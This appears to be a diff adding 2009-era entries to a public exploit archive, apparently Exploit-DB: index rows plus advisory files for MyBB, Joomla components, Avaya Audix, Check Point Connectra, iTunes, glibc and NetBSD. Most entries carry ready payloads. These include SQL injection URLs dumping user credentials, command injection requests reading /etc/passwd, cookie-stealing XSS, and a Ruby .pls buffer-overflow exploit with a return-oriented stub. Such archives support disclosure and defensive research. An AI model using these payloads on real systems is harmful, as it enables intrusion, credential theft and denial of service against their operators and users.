Updated 05_09_2014

files.csv

@@ -29953,3 +29953,18 @@ id,file,description,date,author,platform,type,port
 33225,platforms/windows/dos/33225.html,"EasyMail Objects 6.0.2.0 'emimap4.dll' ActiveX Control Remote Code Execution Vulnerability",2009-09-15,"Francis Provencher",windows,dos,0
 33226,platforms/php/webapps/33226.txt,"Mega File Hosting Script 1.2 'emaillinks.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
 33227,platforms/php/webapps/33227.txt,"TuttoPHP Morris Guestbook 'view.php' Cross Site Scripting Vulnerability",2009-09-16,Moudi,php,webapps,0
+33228,platforms/linux/local/33228.txt,"Linux Kernel 2.6.31 - 'perf_counter_open()' Local Buffer Overflow Vulnerability",2009-09-16,"Xiao Guangrong",linux,local,0
+33229,platforms/bsd/local/33229.c,"NetBSD <= 5.0.1 'IRET' General Protection Fault Handling Local Privilege Escalation Vulnerability",2009-09-16,"Tavis Ormandy",bsd,local,0
+33230,platforms/linux/dos/33230.txt,"GNU glibc 2.x 'strfmon()' Function Integer Overflow Weakness",2009-09-17,"Maksymilian Arciemowicz",linux,dos,0
+33231,platforms/cgi/webapps/33231.txt,"Avaya Intuity Audix LX R1.1 Multiple Remote Vulnerabilities",2009-09-18,pagvac,cgi,webapps,0
+33232,platforms/php/webapps/33232.txt,"MyBB 1.4.8 'search.php' SQL Injection Vulnerability",2009-09-19,$qL_DoCt0r,php,webapps,0
+33233,platforms/linux/dos/33233.txt,"FFmpeg Version 0.5 - Multiple Remote Vulnerabilities",2009-09-21,"Will Dormann",linux,dos,0
+33234,platforms/hardware/remote/33234.txt,"Check Point Connectra R62 '/Login/Login' Arbitrary Script Injection Vulnerability",2009-09-21,"Stefan Friedli",hardware,remote,0
+33235,platforms/osx/dos/33235.rb,"Apple iTunes <= 9.0 '.pls' File Buffer Overflow Vulnerability",2009-09-22,"Roger Hart",osx,dos,0
+33236,platforms/asp/webapps/33236.txt,"MaxWebPortal 1.365 'forum.asp' SQL Injection Vulnerability",2009-09-22,OoN_Boy,asp,webapps,0
+33237,platforms/php/webapps/33237.txt,"Joomla! SportFusion 0.2.x Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0
+33238,platforms/php/webapps/33238.txt,"Joomla! JoomlaFacebook Component SQL Injection Vulnerability",2009-09-22,kaMtiEz,php,webapps,0
+33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone 'view_products.php' SQL Injection Vulnerability",2009-09-22,OoN_Boy,php,webapps,0
+33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0
+33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone view_mag.php mag_id Parameter XSS",2009-09-22,OoN_Boy,php,webapps,0
+33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone SQL Injection Vulnerability",2009-09-23,OoN_Boy,php,webapps,0

platforms/asp/webapps/33236.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36480/info
+
+MaxWebPortal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29-- 

platforms/bsd/local/33229.c

@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/36430/info
+
+NetBSD is prone to a local privilege-escalation vulnerability.
+
+A local attacker may exploit this issue to cause the kernel stack to become desynchronized. This may allow the attacker to gain elevated privileges or may aid in further attacks. 
+
+/* ... */
+int main(int argc, char **argv)
+{
+  jmp_buf env;
+
+  void handlesig(int n) {
+        longjmp(env, 1);
+
+  }
+  signal(SIGSEGV, handlesig);
+
+  if (setjmp(env) == 0) {
+        ( (void(*)(void)) NULL) ();
+  }
+
+  return 0;
+}
+
+/* ... */
+int main(int argc, char **argv)
+{
+       char baguette;
+       signal(SIGABRT, (void (*)(int))&baguette);
+       abort();
+}

platforms/cgi/webapps/33231.txt

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/36450/info
+
+Avaya Intuity Audix LX is prone to multiple remote vulnerabilities, including:
+
+1. Multiple remote command-execution vulnerabilities
+2. A cross-site request-forgery vulnerability
+3. A cross-site scripting vulnerability
+
+Attackers can exploit these issues to execute arbitrary commands with the privileges of 'vexvm' on the underlying system, steal cookie-based authentication credentials, execute arbitrary script code, and perform administrative tasks. Other attacks are also possible. 
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=127.0.0.1;cat+/etc/passwd&count_p=1&size_p=56
+
+POST https://www.example.com/cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=;cat+/etc/passwd
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=&count_p=1;ls&size_p=56
+
+POST /cswebadm/diag/cgi-bin/sendrec.pl HTTP/1.1
+ipadd=&count_p=1&size_p=56&opt_n=;ls
+
+POST /cswebadm/diag/cgi-bin/nslookup.pl HTTP/1.1
+host_or_ip=127.0.0.1&r_type=;ls;
+
+https://www.example.com/cgi-bin/smallmenu.pl?url=%3C/
+title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

platforms/hardware/remote/33234.txt

@@ -0,0 +1,35 @@
+source: http://www.securityfocus.com/bid/36466/info
+
+Check Point Connectra is prone to an arbitrary-script-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary script code in the context of the webserver. Successful exploits can compromise the application. 
+
+--- CUT ---
+POST https://www.example.com:443/Login/Login HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
+Gecko/20090729 Firefox/3.5.2
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Connection: keep-alive
+Referer: https://www.example.com/Login/Login?LangCode=
+Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
+Content-Type: application/x-www-form-urlencoded
+Content-length: 153
+
+loginType=Standard&userName=&vpid_prefix="><embed/src="http://www.example2.com/p/s/w/ccs.swf"
+allowScriptAccess=always><a name="
+&password=&HeightData=1147&Login=Sign+In
+
+--- CUT END ---
+
+Response Snippet:
+
+--- CUT ---
+<input type="hidden" id="vpid_prefix" name="vpid_prefix"
+value=""><embed/src="http://www.example2.com/p/s/w/ccs.swf"
+allowScriptAccess=always><a name="">
+--- CUT END ---

platforms/linux/dos/33230.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36443/info
+
+GNU glibc is prone to an integer-overflow weakness.
+
+An attacker can exploit this issue through other applications such as PHP to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+GNU glibc 2.10.1 and prior are vulnerable. 
+
+The following proof-of-concept commands are available:
+
+php -r 'money_format("%.1073741821i",1);'
+php -r 'money_format("%.1343741821i",1);' 

platforms/linux/dos/33233.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36465/info
+
+FFmpeg is prone to multiple remote vulnerabilities.
+
+Attackers may leverage these issues to execute arbitrary code in the context of the application or crash the application.
+
+FFmpeg 0.5 is affected; other versions may also be vulnerable.
+
+http://www.exploit-db.com/sploits/33233-1.zip
+http://www.exploit-db.com/sploits/33233-2.zip

platforms/linux/local/33228.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36423/info
+
+The Linux kernel is prone to a local buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Local attackers may be able to exploit this issue to run arbitrary code with elevated privileges. Failed exploit attempts may crash the affected kernel, denying service to legitimate users.
+
+The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable.
+
+http://www.exploit-db.com/sploits/33228.tgz

platforms/osx/dos/33235.rb

@@ -0,0 +1,58 @@
+source: http://www.securityfocus.com/bid/36478/info
+
+Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+Versions prior to Apple iTunes 9.0.1 are vulnerable. 
+
+#!/usr/bin/env ruby
+ 
+SETJMP = 0x92F04224
+JMP_BUF = 0x8fe31290
+STRDUP = 0x92EED110
+# 8fe24459 jmp *%eax
+JMP_EAX = 0x8fe24459
+ 
+def make_exec_payload_from_heap_stub()
+frag0 =
+"\x90" + # nop
+"\x58" + # pop eax
+"\x61" + # popa
+"\xc3" # ret
+frag1 =
+"\x90" + # nop
+"\x58" + # pop eax
+"\x89\xe0" + # mov eax, esp
+"\x83\xc0\x0c" + # add eax, byte +0xc
+"\x89\x44\x24\x08" + # mov [esp+0x8], eax
+"\xc3" # ret
+exec_payload_from_heap_stub =
+frag0 +
+[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
+frag1 +
+"X" * 20 +
+[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
+JMP_EAX].pack("V5") +
+"X" * 4
+end
+ 
+payload_cmd = "hereisthetrick"
+stub = make_exec_payload_from_heap_stub()
+ext = "A" * 59
+stub = make_exec_payload_from_heap_stub()
+exploit = ext + stub + payload_cmd
+ 
+# pls file format
+ 
+file = "[playlist]\n"
+file += "NumberOfEntries=1\n"
+file += "File1=http://1/asdf." + exploit + "\n"
+file += "Title1=asdf\n"
+file += "Length1=100\n"
+file += "Version=2" + '\n'
+ 
+File.open('poc.pls','w') do |f|
+f.puts file
+f.close
+end

platforms/php/webapps/33232.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36460/info
+
+MyBB is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+MyBB 1.4.8 is vulnerable; other versions may also be affected.
+
+The following examples are available:
+
+simple query: ' or 1=1--
+blind query: ' having 1=1-- 

platforms/php/webapps/33237.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36481/info
+
+The SportFusion component ('com_sportfusion') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SportFusion 0.2.2 and 0.2.3 are affected; other versions may also be vulnerable.
+
+http://www.example.com/index.php?option=com_sportfusion&view=teamdetail&cid[0]=-666+union+select+1,2,3,4,5,concat(0x3a,username,password)kaMtiez,7,8,9,10,11,12,13+from+jos_users-- 

platforms/php/webapps/33238.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36484/info
+
+The JoomlaFacebook component ('com_facebook') for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_facebook&view=student&id=-666+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12+from+jos_users-- 

platforms/php/webapps/33239.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36485/info
+
+Cosmetics Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following URIs are available:
+
+http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=1-- True
+
+http://www.example.com/cosmetics_zone/view_products.php?cat_id=5&sub_id=4+and+1=2-- False 

platforms/php/webapps/33240.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/36487/info
+
+DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=5 True
+http://www.example.com/view_mag.php?mag_id=9+and+substring(@@version,1,1)=4 False

platforms/php/webapps/33241.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/36487/info
+ 
+DVD Zone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+http://www.example.com/view_mag.php?mag_id=<script>alert(123)</script> 

platforms/php/webapps/33242.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/36503/info
+
+Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True
+http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False